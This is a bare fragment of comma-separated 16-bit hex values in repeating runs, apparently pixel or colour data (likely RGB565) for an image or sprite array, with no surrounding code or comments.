0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
